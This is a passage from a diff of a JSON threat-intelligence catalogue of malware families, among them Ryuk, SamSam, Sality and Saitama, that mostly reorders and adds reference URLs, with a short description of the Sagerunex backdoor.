+ "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders",
+ "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
+ "https://twitter.com/IntelAdvanced/status/1356114606780002308",
+ "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/",
+ "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/",
+ "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/",
+ "https://blog.reversinglabs.com/blog/hunting-for-ransomware",
+ "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP",
+ "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/",
+ "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
"https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/",
"https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html",
- "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/",
- "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
- "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html",
- "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://twitter.com/anthomsec/status/1321865315513520128",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
- "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/",
- "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html",
- "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/",
- "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors",
- "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/",
- "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://twitter.com/IntelAdvanced/status/1353546534676258816",
- "https://www.secureworks.com/research/threat-profiles/gold-ulrick",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/",
- "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
- "https://www.youtube.com/watch?v=CgDtm05qApE",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/",
- "https://www.youtube.com/watch?v=7xxRunBP5XA",
- "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
- "https://github.com/scythe-io/community-threats/tree/master/Ryuk",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://twitter.com/SophosLabs/status/1321844306970251265",
- "https://www.youtube.com/watch?v=BhjQ6zsCVSc",
- "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/",
- "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
- "https://community.riskiq.com/article/0bcefe76",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/",
- "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/",
- "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
- "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/",
- "https://www.youtube.com/watch?v=Of_KjNG9DHc",
- "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://unit42.paloaltonetworks.com/ryuk-ransomware/",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://blog.reversinglabs.com/blog/hunting-for-ransomware",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://twitter.com/ffforward/status/1324281530026524672",
- "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
- "https://twitter.com/IntelAdvanced/status/1356114606780002308",
- "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://0xchina.medium.com/malware-reverse-engineering-31039450af27",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf",
- "https://www.youtube.com/watch?v=HwfRxjV2wok",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/"
+ "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/",
+ "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/"
],
"synonyms": [],
"type": []
@@ -40405,10 +42602,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer",
- "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/",
- "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/",
"https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf",
- "https://twitter.com/VK_Intel/status/1171782155581689858"
+ "https://twitter.com/VK_Intel/status/1171782155581689858",
+ "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/",
+ "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/"
],
"synonyms": [
"Sidoh"
@@ -40457,16 +42654,29 @@
"uuid": "d16f9dc6-290d-4174-8b47-a972cc52dac7",
"value": "SafeNet"
},
+ {
+ "description": "According to Symantec, Sagerunex is a backdoor that is fairly resilient and implements multiple forms of communication with its command-and-control (C&C) server. Its logs are encrypted and the encryption algorithm used is AES256-CBC with 8192 rounds of SHA256 for key derivation based on a hardcoded key. It supports multiple modes methods for communicating via HTTP (proxy-aware).",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sagerunex",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments-cert-authority"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d8228309-ebf8-46fd-a968-bd9e24c498b4",
+ "value": "Sagerunex"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom",
- "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
- "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
"https://www.cert.pl/en/news/single/sage-2-0-analysis/",
"http://malware-traffic-analysis.net/2017/10/13/index.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/"
+ "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/",
+ "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
+ "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga"
],
"synonyms": [
"Saga"
@@ -40495,13 +42705,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot",
- "https://cert.gov.ua/article/18419",
"https://www.cyberscoop.com/ukrainian-cyber-attacks-russia-conflict-q-and-a/",
+ "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/",
"https://unit42.paloaltonetworks.com/atoms/nascentursa/",
"https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
"https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/",
- "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/"
+ "https://cert.gov.ua/article/18419",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/"
],
"synonyms": [],
"type": []
@@ -40515,11 +42725,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.saitama",
"https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html",
+ "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html",
+ "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738",
"https://www.fortinet.com/blog/threat-research/please-confirm-you-received-our-apt",
- "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/",
- "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738"
+ "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/"
],
"synonyms": [
+ "AMATIAS",
"Saitama"
],
"type": []
@@ -40532,14 +42744,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat",
+ "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654",
+ "https://www.secureworks.com/research/sakula-malware-family",
"https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
"https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
- "https://www.secureworks.com/research/sakula-malware-family",
- "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/",
- "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf",
- "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654",
"https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group",
+ "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf",
"https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
+ "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1"
],
"synonyms": [
@@ -40572,15 +42784,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sality",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://unit42.paloaltonetworks.com/c2-traffic/",
"https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
"https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
- "https://unit42.paloaltonetworks.com/c2-traffic/",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf",
+ "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py",
"https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf",
- "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py"
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
],
"synonyms": [],
"type": []
@@ -40606,35 +42818,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf",
- "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/",
- "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/",
- "https://www.secureworks.com/research/threat-profiles/gold-lowell",
- "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
- "https://www.justice.gov/opa/press-release/file/1114746/download",
- "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf",
+ "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/",
"https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit",
+ "https://www.secureworks.com/research/threat-profiles/gold-lowell",
+ "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/",
+ "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
"https://sites.temple.edu/care/ci-rw-attacks/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.justice.gov/opa/press-release/file/1114746/download",
"https://www.secureworks.com/blog/samas-ransomware",
"https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
"https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
- "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/",
- "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
"http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html",
- "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/"
+ "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
+ "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/",
+ "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns"
],
"synonyms": [
"Samas"
@@ -40649,8 +42861,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny",
- "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html",
- "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html"
+ "https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
+ "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
],
"synonyms": [],
"type": []
@@ -40676,11 +42888,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache",
- "https://blog.alyac.co.kr/2219",
- "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails",
- "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html",
"https://blog.alyac.co.kr/m/2219",
- "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf"
+ "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
+ "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails",
+ "https://blog.alyac.co.kr/2219",
+ "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html"
],
"synonyms": [],
"type": []
@@ -40693,9 +42905,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust",
+ "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a",
- "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html",
- "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt"
+ "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html"
],
"synonyms": [
"ENDCMD",
@@ -40711,13 +42923,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/",
+ "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/",
+ "https://www.symantec.com/security-center/writeup/2010-020210-5440-99",
"https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign",
"https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx",
- "https://www.symantec.com/security-center/writeup/2010-020210-5440-99",
- "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis"
],
"synonyms": [
"Oficla"
@@ -40732,14 +42944,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satan",
- "https://www.sangfor.com/source/blog-network-security/1094.html",
+ "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
"http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/",
- "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
"https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/",
"https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html",
+ "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2",
"https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
- "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
- "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2"
+ "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
+ "https://www.sangfor.com/source/blog-network-security/1094.html"
],
"synonyms": [
"5ss5c",
@@ -40756,8 +42968,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satana",
- "https://blog.reversinglabs.com/blog/retread-ransomware",
- "https://www.cylance.com/threat-spotlight-satan-raas"
+ "https://www.cylance.com/threat-spotlight-satan-raas",
+ "https://blog.reversinglabs.com/blog/retread-ransomware"
],
"synonyms": [],
"type": []
@@ -40770,7 +42982,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.satellite_turla",
- "https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/"
+ "https://securelist.com/satellite-turla-apt-command-and-control-in-the-sky/72081/",
+ "https://nsarchive.gwu.edu/sites/default/files/documents/3921357/Government-of-Canada-Hackers-are-Humans-Too.pdf"
],
"synonyms": [],
"type": []
@@ -40789,15 +43002,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "35849d8f-5bac-475b-82f8-7d555f37de12",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369",
"value": "Sathurbot"
},
@@ -40806,9 +43010,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos",
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md",
"https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
- "https://securitykitten.github.io/2016/11/15/scanpos.html",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md"
+ "https://securitykitten.github.io/2016/11/15/scanpos.html"
],
"synonyms": [],
"type": []
@@ -40838,10 +43042,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
"http://malware-traffic-analysis.net/2017/11/23/index.html",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/"
